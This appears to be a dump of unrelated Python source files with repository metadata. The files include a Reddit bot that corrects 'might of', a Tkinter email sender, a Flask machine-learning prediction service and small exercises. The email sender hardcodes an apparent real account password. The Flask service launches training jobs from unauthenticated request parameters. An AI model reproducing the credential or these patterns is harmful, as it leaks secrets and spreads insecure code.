elif val < root.val:
root.left = add_node(root.left, val)
else:
root.right = add_node(root.right, val)
return root
root = TreeNode(10)
add_node(root, 5)
add_node(root, 15)
| [
"erthaljonas@gmail.com"
] | erthaljonas@gmail.com |
986d770ae16a5a17ea8ab21a9c8611ad9ec844f3 | e62b1e748582584a5c2a05fff970fe09e72752b4 | /app/migrations/0084_auto_20200312_2145.py | 78c8618744d5f9bd75ef8f090009cc7f7e073750 | [] | no_license | wlodekf/jpk | 5957b515ecbcded9b4f27d6a0785ee89e3a0d585 | 1c200350f57469e890a124d07f741d836d9a0833 | refs/heads/master | 2023-07-10T20:15:11.111276 | 2021-08-11T12:21:14 | 2021-08-11T12:21:14 | 394,978,461 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 645 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.14.dev20170906233242 on 2020-03-12 21:45
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0083_auto_20200304_1321'),
]
operations = [
migrations.AddField(
model_name='plik',
name='kod_systemowy',
field=models.CharField(max_length=20, null=True),
),
migrations.AddField(
model_name='plik',
name='wersja_schemy',
field=models.CharField(max_length=5, null=True),
),
]
| [
"wlodekf@softprodukt.com.pl"
] | wlodekf@softprodukt.com.pl |
d4e579745fae8a47e60cc476411f97325d51b3fc | 9a9e47d9cf1f663de411218a533c10bbf288cc9d | /config/wsgi.py | bc1f238dd14822d7df2fe5c0fdcf05f70c23e3ec | [
"MIT"
] | permissive | eyobofficial/Gebeya-Schedule-Bot | 110f862a5e905c127e23ec0ad9bc9406f4180859 | 8c757fa8c26cf5dda6f917997c521d0f37b28aa9 | refs/heads/development | 2022-12-14T10:23:17.323365 | 2019-09-16T18:28:37 | 2019-09-16T18:28:37 | 204,556,349 | 3 | 2 | MIT | 2022-04-22T22:17:15 | 2019-08-26T20:31:16 | Python | UTF-8 | Python | false | false | 442 | py | """
WSGI config for config project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from decouple import config
from django.core.wsgi import get_wsgi_application
os.environ.setdefault(
"DJANGO_SETTINGS_MODULE",
config("DJANGO_SETTINGS_MODULE")
)
application = get_wsgi_application()
| [
"eyobtariku@gmail.com"
] | eyobtariku@gmail.com |
03a4d393129093fd3cb0de5abf29c81b36c85ec2 | d7d3775e373983c2db3fad814f961a8588e60e64 | /main.py | 527bc3f8eb8a298f867e69f8ef0bcfde405b2016 | [] | no_license | arielbeje/Might_have_meant | 2ed80b7ae789ef2aaca1c336ba0b06ba62d00138 | ebba15010002cbf2a045e9b6ceae40a4da839297 | refs/heads/master | 2021-07-22T19:27:23.324799 | 2017-11-02T14:33:53 | 2017-11-02T14:33:53 | 108,294,838 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,015 | py | import praw
import json
import os
import time
import datetime
import logging
import traceback
import re
import threading
if not os.path.isfile('log.txt'):
f = open('log.txt', 'w+')
f.close()
logging.basicConfig(filename='log.txt', level=logging.WARNING,
format='%(asctime)s %(levelname)s %(name)s %(message)s')
logger = logging.getLogger(__name__)
reddit = praw.Reddit('bot1')
subreddit = reddit.subreddit('all')
starttime = time.time()
user = reddit.redditor('Might_have_meant')
threshold = 0
comments = user.comments.new(limit=None)
searchpattern = re.compile("((combined|whole|the( \w+)?) might of)|might of (an?|which|the|necessity|course|heroes|old) |(?P<quot>[\'\"]).*?might of.*?(?P=quot)", re.IGNORECASE)
for dblist in ['comments_replied_to', 'users_replied_to', 'subreddit_blacklist', 'user_blacklist', 'sentence_blacklist', 'past_deleted', 'subreddits_commented']:
if not os.path.isfile(str(dblist) + '.json'):
globals()[dblist] = []
f = open('%s.json' % str(dblist), 'w+')
f.close()
else:
with open('%s.json' % str(dblist), 'r') as f:
globals()[dblist] = json.load(f)
'''if not os.path.isfile('comments_replied_to.json'):
comments_replied_to = []
else:
with open('comments_replied_to.json', 'r') as f:
comments_replied_to = json.load(f)
comments_replied_to = list(filter(None, comments_replied_to))
if not os.path.isfile('users_replied_to.json'):
users_replied_to = []
else:
with open('users_replied_to.json', 'r') as f:
users_replied_to = json.load(f)
users_replied_to = list(filter(None, users_replied_to))
if not os.path.isfile('subreddit_blacklist.json'):
subreddit_blacklist = []
else:
with open('subreddit_blacklist.json', 'r') as f:
subreddit_blacklist = json.load(f)
subreddit_blacklist = list(filter(None, subreddit_blacklist))
if not os.path.isfile('user_blacklist.json'):
user_blacklist = []
else:
with open('user_blacklist.json', 'r') as f:
user_blacklist = json.load(f)
user_blacklist = list(filter(None, user_blacklist))
if not os.path.isfile('sentence_blacklist.json'):
sentence_blacklist = []
else:
with open('sentence_blacklist.json', 'r') as f:
sentence_blacklist = json.load(f)
sentence_blacklist = list(filter(None, sentence_blacklist))
if not os.path.isfile('past_deleted.json'):
past_deleted = []
else:
with open('past_deleted.json', 'r') as f:
past_deleted = json.load(f)
past_deleted = list(filter(None, past_deleted))
if not os.path.isfile('subreddits_commented.json'):
subreddits_commented = []
else:
with open('subreddits_commented.json', 'r') as f:
subreddits_commented = json.load(f)
subreddits_commented = list(filter(None, subreddits_commented))'''
def updatedb(dbtype):
if dbtype == 'cdb':
with open('comments_replied_to.json', 'w') as f:
f.write(json.dumps(comments_replied_to, sort_keys=True, indent=4))
elif dbtype == 'udb':
with open('users_replied_to.json', 'w') as f:
f.write(json.dumps(users_replied_to, sort_keys=True, indent=4))
elif dbtype == 'ubl':
with open('user_blacklist.json', 'w') as f:
f.write(json.dumps(user_blacklist, sort_keys=True, indent=4))
elif dbtype == 'pdl':
with open('past_deleted.json', 'w') as f:
f.write(json.dumps(past_deleted, sort_keys=True, indent=4))
elif dbtype == 'sbl':
with open('subreddit_blacklist.json', 'w') as f:
f.write(json.dumps(subreddit_blacklist, sort_keys=True, indent=4))
elif dbtype == 'scm':
with open('subreddits_commented.json', 'w') as f:
f.write(json.dumps(subreddits_commented, sort_keys=True, indent=4))
def runbot():
while True:
try:
comments = subreddit.stream.comments()
for comment in comments:
content = comment.body
originalComment = comment
refresh_counter = 0
while not comment.is_root:
comment = comment.parent()
if refresh_counter % 9 == 0:
comment.refresh()
refresh_counter += 1
if ' might of ' in content.lower():
if (comment.id not in comments_replied_to and
str(comment.author) not in user_blacklist and
comment.created > starttime and
str(comment.subreddit).lower() not in subreddit_blacklist and
searchpattern.search(content) is None):
mightofcapt = re.search(".*?(might of).*?", content, flags=re.IGNORECASE).group(1)
comment.reply('''> %s
Did you mean might have?
***
^^I ^^am ^^a ^^bot, ^^and ^^this ^^action ^^was ^^performed ^^automatically.
^^| ^^I ^^accept ^^feedback ^^in ^^PMs. ^^|
^^[[Opt-out]](http://np.reddit.com/message/compose/?to=Might_have_meant&subject=User+Opt+Out&message=Click+send+to+opt+yourself+out.) ^^|
^^Moderator? ^^Click ^^[[here]](http://np.reddit.com/message/compose/?to=Might_have_meant&subject=Subreddit+Opt+Out&message=Click+send+to+opt+your+subreddit+out.) to opt out all of your moderated subreddits. ^^|
^^Downvote ^^this ^^comment ^^to ^^delete ^^it. ^^| [^^\[Source ^^Code\]](https://github.com/arielbeje/Might_have_meant) ^^| ^^[[Programmer]](https://np.reddit.com/message/compose/?to=arielbeje)''' % mightofcapt)
print('Fixed a commment by /u/' + str(originalComment.author))
comments_replied_to.append(comment.id)
updatedb('cdb')
users_replied_to.append(str(originalComment.author))
updatedb('udb')
if str(comment.subreddit) not in subreddits_commented:
subreddits_commented.append(str(comment.subreddit))
updatedb('scm')
except Exception as e:
logger.error(traceback.format_exc())
print("I have encountered an error, and have added it to the log.")
time.sleep(60)
continue
def deletepast():
while True:
comments = user.comments.new(limit=None)
# print("Deleting downvoted comments...")
for comment in comments:
creatd = datetime.datetime.fromtimestamp(comment.created_utc)
try:
if(comment.score < threshold and comment.id not in past_deleted and
creatd + datetime.timedelta(hours=1) < datetime.datetime.utcnow()):
comment.delete()
print("Deleted a comment on /r/" + str(comment.subreddit))
past_deleted.append(comment.id)
# elif(creatd + datetime.timedelta(hours=1) > datetime.datetime.utcnow() and
# comment.score < threshold and comment.id not in past_deleted):
# print("Did not delete <1 hour old comment with ID " + comment.id)
except Exception as e:
logger.error(traceback.format_exc())
print("I have encountered an error, and have added it to the log.")
continue
updatedb('pdl')
time.sleep(3600)
def readpms():
to_mark_read = []
for item in reddit.inbox.stream():
# print("Checking message with subject \"%s\"" % item.subject)
if(isinstance(item, praw.models.Message) and item.author not in user_blacklist and
not isinstance(item, praw.models.SubredditMessage)):
if (item.subject.lower() == "user opt out" or
item.subject.lower() == "user+opt+out"):
user_blacklist.append(str(item.author))
updatedb('ubl')
item.reply("You have been added to the user blacklist of this bot.")
print("Added /u/" + str(item.author) + " to user blacklist.")
to_mark_read.append(item)
reddit.inbox.mark_read(to_mark_read)
to_mark_read = []
elif (item.subject.lower() == "subreddit opt out" or
item.subject.lower() == "subreddit+opt+out"):
subreddits_toblacklist = []
for subr in subreddits_commented:
if (item.author in reddit.subreddit(subr).moderator() and
str(subr).lower() not in subreddit_blacklist):
subreddit_blacklist.append(str(subr).lower())
updatedb('sbl')
subreddits_toblacklist.append(str(subr))
if subreddits_toblacklist != []:
subreddits_toblacklist = [s + "/r/" for s in subreddits_toblacklist]
subreddits_toblacklist = re.sub("[\\['\\]]", '', str(list(subreddits_toblacklist)))
item.reply("I have added %s to my subreddit blacklist." % subreddits_toblacklist)
print("Added %s to subreddit blacklist." % subreddits_toblacklist)
subreddits_toblacklist = []
else:
item.reply("All of your moderated subreddits are already in my blacklist.")
to_mark_read.append(item)
reddit.inbox.mark_read(to_mark_read)
to_mark_read = []
else:
if str(item.author) != "AutoModerator":
print("Got a PM from " + str(item.author) + " saying:")
print("\"" + str(item.body) + "\"")
elif (str(item.author) == "AutoModerator" and
re.search("Your post in /r/(.*) has been removed!", item.subject) is not None):
subreddit_blacklist.append(re.search("Your post in /r/(.*) has been removed!", item.subject).group(1).lower())
updatedb('sbl')
print("My submission has been removed from /r/%s, and I have added it to the subreddit blacklist."
% re.search("Your post in /r/(.*) has been removed!", item.subject).group(1))
to_mark_read.append(item)
reddit.inbox.mark_read(to_mark_read)
to_mark_read = []
elif not isinstance(item, praw.models.Message):
if item.subject == "comment reply":
if(re.search("^((\w+)( \w+){0,2}) bot(?!.*s)", str(item.body), flags=re.IGNORECASE) is not None and
item.body.lower().startswith("fuck ") is False):
adjUsed = re.search("^((\w+)( \w+){0,2}) bot(?!.*s)", str(item.body), flags=re.IGNORECASE).group(1)
prefix = "said I'm a"
if adjUsed[0] in "aeiou":
prefix = "said I'm an"
if re.search("^\w+st bot", str(item.body), flags=re.IGNORECASE) is not None:
prefix = "said I'm the"
if re.search("^favou?rite bot", str(item.body), flags=re.IGNORECASE) is not None:
prefix = "said I'm his/her"
print("/u/" + str(item.author) + " " + prefix + " %s bot."
% adjUsed)
else:
if len(str(item.body)) >= 200:
print("Got a comment reply from /u/" + str(item.author) +
" saying: \"%s\"" % str(item.body))
else:
print("Got a comment reply from /u/" + str(item.author) +
": https://www.reddit.com/api/info.json?id=" + str(item.fullname))
to_mark_read.append(item)
reddit.inbox.mark_read(to_mark_read)
to_mark_read = []
elif isinstance(item, praw.models.SubredditMessage):
if "You've been banned from participating in" in item.subject:
subreddit_blacklist.append(item.subject[43:].lower())
updatedb('sbl')
print("I have been banned from /r/" + item.subject[43:] +
", and have added it to the subreddit blacklist.")
else:
print("Got a subreddit message with the title \"%s\"" % str(item.subject))
to_mark_read.append(item)
reddit.inbox.mark_read(to_mark_read)
to_mark_read = []
if __name__ == '__main__':
threading.Thread(target=runbot).start()
threading.Thread(target=deletepast).start()
threading.Thread(target=readpms).start()
| [
"arielb624@gmail.com"
] | arielb624@gmail.com |
0b9845a1dd7ff42f02f9dcf5f9f84eff059cf5b3 | 11dacddbfd4335419280b0ca63aaaa4dd49e2c42 | /Ejercicio 3.py | 51a3026505388eeed9d7785feeb57918e782597f | [] | no_license | Adrian-SB/XML | bf2ca0c9f429348d2b13cdf04b13ca140cc45c27 | 4d279ac63b32cd8d4849b1a5db21ef7ae471e8ea | refs/heads/master | 2020-05-27T14:50:27.501614 | 2017-03-09T17:29:53 | 2017-03-09T17:29:53 | 82,561,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 329 | py | # -*- coding: utf-8 -*-
from lxml import etree
doc = etree.parse("Empresas.xml")
raiz=doc.getroot()
#3-Lista las empresas con más de un teléfono.
nombres=raiz.findall("empresa/titulo")
telefonos=("empresa/telefono")
sep="/"
for n in nombres:
if sep in telefonos:
print "La empresa",n.text, "tiene 2 telefonos"
| [
"noreply@github.com"
] | noreply@github.com |
afc12a16980d6f8d26efb9e5861fdbff5be747a0 | 8650145ce5bf5f415f56d979b1a43cd3204628b8 | /Week 6 - Python APIs/Activities/3/Activities/09-Stu_Census/Unsolved/config.py | d0690c8370feeafe7512d99d32a61de35007117a | [] | no_license | Axioma42/Data_Analytics_Boot_Camp | d26f9035475cc1272ecbeff4054bc30f098933bb | 2c4be5eee7d016ba0f6505df2cb6e0a8ade0554c | refs/heads/master | 2022-12-11T15:27:10.495147 | 2019-11-10T01:12:23 | 2019-11-10T01:12:23 | 219,831,300 | 2 | 0 | null | 2022-12-08T02:35:58 | 2019-11-05T19:14:18 | Jupyter Notebook | UTF-8 | Python | false | false | 75 | py | # Enter your API keys
api_key = "YOUR KEY HERE!"
gkey = "YOUR KEY HERE!"
| [
"julio.padillaaviles@gmail.com"
] | julio.padillaaviles@gmail.com |
b49846e8bb66b1799b99451978e59a5d83fc92e9 | 13d13f28031e6b89b4a49918792349f4eaaa9e4f | /Project 5 - Email Sender.py | bfd3b4d058a74256a4193cc0dc760fb1b628ecbf | [] | no_license | TheFREAK69/Udemy-Master_Tkinter_By_Building_5_Fully_Functioning_Apps | 8d128614b6bfe7961f3a3837d3e437ddacc6ac08 | 170246976011eb6d813f1fbd29ab946158b53913 | refs/heads/master | 2020-03-15T07:04:24.768782 | 2018-05-03T16:30:54 | 2018-05-03T16:30:54 | 132,021,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,033 | py | ########################################################################################################################
#
# DATE: 2018-05-01
#
# RELEASE Notes:
# - Email function not working.
# - Everything else is ok.
#
########################################################################################################################
#============================================= Tkinter Settings =======================================================#
from tkinter import * # Not ready because cannot send mail.
from smtplib import SMTP_SSL as SMTP
from email.mime.text import MIMEText
#============================================= Main Window Settings ===================================================#
main_window = Tk()
main_window.title('Email Sender app')
main_window.geometry('800x500')
main_window.resizable(width=FALSE, height=FALSE)
main_window_bg_colour = 'gray30' # Set this as a variable that can be used across the code
main_window.configure(bg=main_window_bg_colour)
#============================================= Variables ==============================================================#
send_from_variable = StringVar()
send_to_variable = StringVar()
email_message_variable = StringVar()
#============================================= Functions ==============================================================#
def clear_from_function():
send_from_entry.delete(0, END)
def clear_to_function():
send_to_entry.delete(0, END)
def clear_all_function():
clear_from_function()
clear_to_function()
email_message.delete('1.0', END)
def send_email_function():
HOST = 'smtp.gmail.com'
PORT = 465
USERNAME = send_from_entry.get()
PASSWORD = 'Appolo!7'
SENDER = send_from_entry.get()
RECIPIENT = send_to_entry.get()
text_subtype = 'plain'
msg = MIMEText('text', text_subtype)
msg['Subject'] = 'Python Script'
msg['From'] = SENDER
msg['To'] = RECIPIENT
try:
connection = SMTP(HOST, PORT)
connection.login(USERNAME, PASSWORD)
connection.sendmail(SENDER, RECIPIENT, msg.as_string())
except Exception as e:
print(e)
#=============================================== Frames ===============================================================#
top_frame = Frame(main_window, width=900, height=50, bg=main_window_bg_colour)
top_frame.pack(side=TOP)
bottom_frame = Frame(main_window, width=800, height=50, bg='black')
bottom_frame.pack(side=BOTTOM)
left_frame = Frame(main_window, width=600, height=400, bg=main_window_bg_colour)
left_frame.pack(side=LEFT)
right_frame = Frame(main_window, width=200, height=400, bg=main_window_bg_colour)
right_frame.pack(side=RIGHT)
#=============================================== Buttons ==============================================================#
clear_from_button = Button(right_frame, text="Clear From", width=10, highlightbackground=main_window_bg_colour,
command=lambda : clear_from_function())
clear_from_button.pack(side=TOP, padx=(0,8), pady=(0,5))
clear_to_button = Button(right_frame, text="Clear To", width=10, highlightbackground=main_window_bg_colour,
command=lambda: clear_to_function())
clear_to_button.pack(side=TOP, padx=(0,8), pady=(0,5))
clear_all_button = Button(right_frame, text="Clear All", width=15, highlightbackground=main_window_bg_colour,
command=lambda: clear_all_function())
clear_all_button.pack(side=TOP, padx=(0,8), pady=(0,5))
send_button = Button(right_frame, text="Send Email", width=20, highlightbackground=main_window_bg_colour,
command=lambda: send_email_function())
send_button.pack(side=TOP, padx=(0,8), pady=(20,0))
#=========================================== Labels + Entries =========================================================#
send_from_label = Label(top_frame, text="From:", font=('', 25, 'bold'), fg='white', bg=main_window_bg_colour)
send_from_label.pack(side=LEFT, padx=(0,0), pady=(5,5))
send_from_entry = Entry(top_frame, width=30, textvariable=send_from_variable, fg='white', font=('', 15),
bg=main_window_bg_colour, bd=4)
send_from_entry.pack(side=LEFT, padx=(0,10), pady=(5,5))
send_to_label = Label(top_frame, text="To:", font=('', 25, 'bold'), fg='white', bg=main_window_bg_colour)
send_to_label.pack(side=LEFT, padx=(0,0), pady=(5,5))
send_to_entry = Entry(top_frame, width=30, textvariable=send_to_variable, fg='white', font=('', 15),
bg=main_window_bg_colour, bd=4)
send_to_entry.pack(side=LEFT, padx=(0,10), pady=(5,5))
#==================================================== Text ============================================================#
email_message = Text(left_frame, font=('', 15), width=59, bg='white')
email_message.pack(side=LEFT, padx=(1,1), pady=(1,1))
#================================================== Main Loop =========================================================#
main_window.mainloop() | [
"noreply@github.com"
] | noreply@github.com |
0d15a97572af7fdb6b7ca4d3361515e161ea6c19 | 7216bcfa10aa4d0c891d11845beda6139f608264 | /Oeving1/tetraeder.py | 9665b70963e8504c1fc3c9f744f16b75c2d55969 | [] | no_license | kaffikaffi/ITGK | 4fc6f2c0383b75e1439f3f87b9fe2498f019a6ee | c87cb9da129584e9269dd4ce1d6b8451f08b2c35 | refs/heads/master | 2020-07-13T18:07:17.635353 | 2019-10-06T19:16:11 | 2019-10-06T19:16:11 | 205,128,540 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 324 | py | height = input("hva er høyden til tetraederet?: ")
import math
a = 3/(math.sqrt(6)) * int(height)
surface_area = math.sqrt(3) * math.pow(a, 2)
volume = (math.sqrt(2) * math.pow(a, 3) ) / 12
print("I et tetraeder der høyden er " + height + " blir overflatearealet " + str(surface_area) + " og volumet blir " + str(volume)) | [
"35420892+kaffikaffi@users.noreply.github.com"
] | 35420892+kaffikaffi@users.noreply.github.com |
3ee9bb126a75e9e5ea4cf37cbc3ae41b39e9747b | c975fd016cdb72b5e4bbded9706f224bb993084c | /application.py | 3a5e080e3f0b2f5d253a88bb9762641f156e5061 | [
"MIT"
] | permissive | UCB-MIDS/w210_crime_machine_learning | 5c5350fa628c90c8d8c7d3a1ee79ea516219979d | 4105b3afd4d3457904d94d06abf2205fbda68e94 | refs/heads/master | 2020-04-20T20:15:50.890268 | 2019-04-14T23:34:28 | 2019-04-14T23:34:28 | 169,071,721 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,420 | py | # W210 Police Deployment
# MACHINE LEARNING Microservices
import numpy as np
import pandas as pd
import subprocess
import shlex
import threading
import s3fs
import tempfile
import pickle
import joblib
import json
import itertools
import configparser
from datetime import datetime
from scipy.stats import t
from collections import defaultdict
from flask import Flask
from flask_restful import Resource, Api, reqparse
from flask_cors import CORS, cross_origin
from flask_sqlalchemy import SQLAlchemy
# Calculation of prediction Fairness
# Uses a difference of means test as described in https://link.springer.com/article/10.1007%2Fs10618-017-0506-1
def calculateFairness(communities, predictions):
comm_count = {0: 0, 1: 0}
predicted_count = {0: 0, 1: 0}
for comm in predictions:
comm_code = int(comm)
if (communities[comm_code]['ethnicity'] == 0) or (communities[comm_code]['ethnicity'] == 1):
comm_count[1] += 1
predicted_count[1] += predictions[comm]
else:
comm_count[0] += 1
predicted_count[0] += predictions[comm]
df = comm_count[0]+comm_count[1]-2
if (predicted_count[0] == 0) and (predicted_count[1] == 0):
return 1
means = {0: predicted_count[0]/comm_count[0], 1: predicted_count[1]/comm_count[1]}
variances = {0: 0, 1: 0}
for comm in predictions:
comm_code = int(comm)
if (communities[comm_code]['ethnicity'] == 0) or (communities[comm_code]['ethnicity'] == 1):
variances[1] += (predictions[comm]-means[1])**2
else:
variances[0] += (predictions[comm]-means[0])**2
variances = {0: variances[0]/(comm_count[0]-1), 1: variances[1]/(comm_count[1]-1)}
sigma = ((((comm_count[0]-1)*(variances[0]**2))+((comm_count[1]-1)*(variances[1]**2)))/(comm_count[0]+comm_count[1]-2))**0.5
t_stat = (means[0]-means[1])/(sigma*(((1/comm_count[0])+(1/comm_count[1]))**0.5))
fairness = (1 - t.cdf(abs(t_stat), df)) * 2
fairness = fairness*100
return fairness
def load_keras_model(modelname):
from keras.models import model_from_json
from keras.models import Sequential
from keras.layers import Dense
from keras import backend as K
from keras.wrappers.scikit_learn import KerasRegressor
import tensorflow as tf
s3fs.S3FileSystem.read_timeout = 5184000 # one day
s3fs.S3FileSystem.connect_timeout = 5184000 # one day
s3 = s3fs.S3FileSystem(anon=False)
K.clear_session()
struct_file = 'w210policedata/models/'+modelname+'/keras_struct.json'
weights_file = 'w210policedata/models/'+modelname+'/keras_weights.h5'
features_file = 'w210policedata/models/'+modelname+'/keras_features.pickle'
scaler_file = 'w210policedata/models/'+modelname+'/keras_scaler.pickle'
modelinfo_file = 'w210policedata/models/'+modelname+'/modelinfo.pickle'
with s3.open(struct_file, "r") as json_file:
model = model_from_json(json_file.read())
json_file.close()
temp_file = tempfile.NamedTemporaryFile(delete=True)
s3.get(weights_file,temp_file.name)
model.load_weights(temp_file.name)
graph = tf.get_default_graph()
temp_file.close()
model.compile(loss='mean_squared_error', optimizer='adam', metrics=['mean_absolute_error'])
with s3.open(features_file, "rb") as pickle_file:
model_features = pickle.load(pickle_file)
pickle_file.close()
model_type = 'keras'
with s3.open(scaler_file, "rb") as pickle_file:
model_scalers = pickle.load(pickle_file)
pickle_file.close()
with s3.open(modelinfo_file, "rb") as pickle_file:
model_info = pickle.load(pickle_file)
pickle_file.close()
model_name = model_info['modelname']
return model,model_name,model_features,graph,model_type,model_scalers,model_info
def load_xgb_model(modelname):
from xgboost import XGBRegressor
s3fs.S3FileSystem.read_timeout = 5184000 # one day
s3fs.S3FileSystem.connect_timeout = 5184000 # one day
s3 = s3fs.S3FileSystem(anon=False)
model_file = 'w210policedata/models/'+modelname+'/xgbregressor_model.joblib'
features_file = 'w210policedata/models/'+modelname+'/xgbregressor_features.pickle'
scaler_file = 'w210policedata/models/'+modelname+'/xgbregressor_scaler.pickle'
modelinfo_file = 'w210policedata/models/'+modelname+'/modelinfo.pickle'
temp_file = tempfile.NamedTemporaryFile(delete=True)
s3.get(model_file,temp_file.name)
model = joblib.load(temp_file.name)
graph = None
temp_file.close()
with s3.open(features_file, "rb") as pickle_file:
model_features = pickle.load(pickle_file)
pickle_file.close()
#model.get_booster().feature_names = model_features
model_type = 'xgboost'
with s3.open(scaler_file, "rb") as pickle_file:
model_scalers = pickle.load(pickle_file)
pickle_file.close()
with s3.open(modelinfo_file, "rb") as pickle_file:
model_info = pickle.load(pickle_file)
pickle_file.close()
model_name = model_info['modelname']
return model,model_name,model_features,graph,model_type,model_scalers,model_info
def load_model(modelname):
modelinfo_file = 'w210policedata/models/'+modelname+'/modelinfo.pickle'
with s3.open(modelinfo_file, "rb") as pickle_file:
model_info = pickle.load(pickle_file)
pickle_file.close()
if model_info['type'] == 'keras':
return load_keras_model(modelname)
else:
return load_xgb_model(modelname)
### Load Flask configuration file
s3fs.S3FileSystem.read_timeout = 5184000 # one day
s3fs.S3FileSystem.connect_timeout = 5184000 # one day
s3 = s3fs.S3FileSystem(anon=False)
config_file = 'w210policedata/config/config.py'
try:
s3.get(config_file,'config.py')
except:
print('Failed to load application configuration file!')
application = Flask(__name__)
api = Api(application)
application.config.from_pyfile('config.py')
db = SQLAlchemy(application)
application.config['CORS_ENABLED'] = True
CORS(application)
## Define the DB model
class Community(db.Model):
__tablename__ = 'community'
id = db.Column(db.Integer, primary_key=True)
code = db.Column(db.Integer)
name = db.Column(db.String(255))
ethnicity = db.Column(db.Integer)
def __str__(self):
return self.name
runningProcess = None
processStdout = []
model = None
model_name = None
model_features = None
model_type = None
graph = None
model_scalers = None
model_info = None
available_features = None
features_data = None
### Load default model configuration from configuration file
s3fs.S3FileSystem.read_timeout = 5184000 # one day
s3fs.S3FileSystem.connect_timeout = 5184000 # one day
s3 = s3fs.S3FileSystem(anon=False)
config_file = 'w210policedata/config/ml.ini'
try:
temp_file = tempfile.NamedTemporaryFile(delete=True)
s3.get(config_file,temp_file.name)
config = configparser.ConfigParser()
config.read(temp_file.name)
except:
print('Failed to load configuration file.')
print('Creating new file with default values.')
config = configparser.ConfigParser()
config['GENERAL'] = {'DefaultModel': 'keras'}
temp_file = tempfile.NamedTemporaryFile(delete=True)
with open(temp_file.name, 'w') as confs:
config.write(confs)
s3.put(temp_file.name,config_file)
temp_file.close()
default_model = config['GENERAL']['DefaultModel']
model,model_name,model_features,graph,model_type,model_scalers,model_info = load_model(default_model)
try:
features_file = 's3://w210policedata/datasets/AvailableFeatures.pickle'
s3 = s3fs.S3FileSystem(anon=False)
with s3.open(features_file, "rb") as json_file:
available_features = pickle.load(json_file)
json_file.close()
# features_file = 's3://w210policedata/datasets/AdditionalFeatures.parquet'
# features_data = pd.read_parquet(features_file)
features_file = 's3://w210policedata/datasets/AdditionalFeatures.csv'
features_data = pd.read_csv(features_file)
features_data['Community Area'] = features_data['Community Area'].map(str)
except Exception as e:
print('Failure reading additional feature data from S3.')
# Services to implement:
# * Train
# * Predict
# * Evaluate model
def processTracker(process):
for line in iter(process.stdout.readline, b''):
processStdout.append('{0}'.format(line.decode('utf-8')))
process.poll()
class checkService(Resource):
def get(self):
# Test if the service is up
return {'message':'Machine learning service is running.','result': 'success'}
class trainModel(Resource):
def get(self):
# Run background worker to read from S3, transform and write back to S3
global runningProcess
global processStdout
trainParser = reqparse.RequestParser()
trainParser.add_argument('modelname')
trainParser.add_argument('modeltype')
trainParser.add_argument('features')
args = trainParser.parse_args()
if args['modelname'] is None:
return {'message':'Missing modelname argument.','result':'failed'}
if args['modeltype'] is None:
return {'message':'Missing modeltype argument. Supported types: keras, xgboost.','result':'failed'}
if args['features'] is None:
return {'message':'Missing features argument.','result':'failed'}
if (runningProcess is not None):
if (runningProcess.poll() is None):
return {'message':'There is a model training job currently running.','pid':runningProcess.pid,'result': 'failed'}
try:
if json.loads(args['modeltype']) == 'keras':
command = 'python trainer_keras.py'
else:
command = 'python trainer_xgbregressor.py'
command += ' '+json.loads(args['modelname'])
for feature in json.loads(args['features']):
command += ' "'+feature+'"'
print(shlex.split(command))
runningProcess = subprocess.Popen(shlex.split(command),stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
processStdout = []
t = threading.Thread(target=processTracker, args=(runningProcess,))
t.start()
except:
return{'message':'Model training failed.','pid':None,'result': 'failed'}
return {'message':'Model training started.','pid':runningProcess.pid,'result': 'success'}
class getTrainingStatus(Resource):
def get(self):
global runningProcess
global processStdout
# Check if the background worker is running and how much of the work is completed
if (runningProcess is not None):
returncode = runningProcess.poll()
if (returncode is not None):
if (returncode != 0):
return {'returncode':returncode,'status':'Model training failed','stdout':processStdout}
else:
return {'returncode':returncode,'status':'Model training finished succesfully','stdout':processStdout}
else:
return {'returncode':None,'status':'Model is still training','stdout':processStdout}
return {'returncode':None,'status':'No model training running','stdout': None}
class killTrainer(Resource):
def get(self):
global runningProcess
global processStdout
# Check if the worker is running and kill it
if (runningProcess is not None):
returncode = runningProcess.poll()
if (returncode is None):
runningProcess.kill()
processStdout.append('[' + str(datetime.now()) + '] Model training killed.')
return {'message':'Kill signal sent to model trainer.','result':'success'}
return {'message':'No model training running','result': 'failed'}
class predict(Resource):
# Get predictors
def get(self):
global model
global model_name
global model_features
global model_type
if (model is None):
return {'message':'Model is not loaded','result':'failed'}
return {'model_name':model_name,'model_type':model_type,'input_features':model_features,'result':'success'}
# Run the predictions
def post(self):
global model
global model_features
global graph
global model_type
global model_scalers
global model_info
global available_features
global features_data
predictParser = reqparse.RequestParser()
predictParser.add_argument('communityarea')
predictParser.add_argument('weekday')
predictParser.add_argument('weekyear')
predictParser.add_argument('hourday')
if (model is None):
return {'message':'Model is not loaded','result':'failed'}
args = predictParser.parse_args()
for arg in args:
if args[arg] is None:
if (arg == 'communityarea'):
args[arg] = [i for i in range(1,78)]
else:
return {'message':'Missing input '+arg,'result':'failed'}
else:
args[arg] = json.loads(args[arg])
df = pd.DataFrame()
crime_types = [x for x in model_features if x.startswith('primaryType_')]
results = []
for ca,wy,wd,hd,ct in itertools.product(args['communityarea'],args['weekyear'],args['weekday'],args['hourday'],crime_types):
line = {'Community Area':str(ca),'Week of the Year':str(wy),'Day of the Week':str(wd),
'Period of the Day':str(hd),'Crime Type':ct.replace('primaryType_','')}
df = df.append(line, ignore_index=True)
results.append({'communityArea':str(ca),'weekYear':wy,'weekDay':wd,'hourDay':hd,'primaryType':ct.replace('primaryType_',''),'pred':None})
df = pd.merge(df, features_data, on='Community Area')
for feat in available_features:
if feat['onehot-encoded']:
df = pd.concat([df,pd.get_dummies(df[feat['feature']], prefix=feat['column'])],axis=1)
df.drop(columns=[feat['feature']], inplace=True)
for feat in model_features:
if feat not in df:
df[feat] = 0
df.fillna(0,inplace=True)
df = df.filter(items=model_features,axis=1)
if (model_type == 'keras'):
df = model_scalers['x'].transform(df)
with graph.as_default():
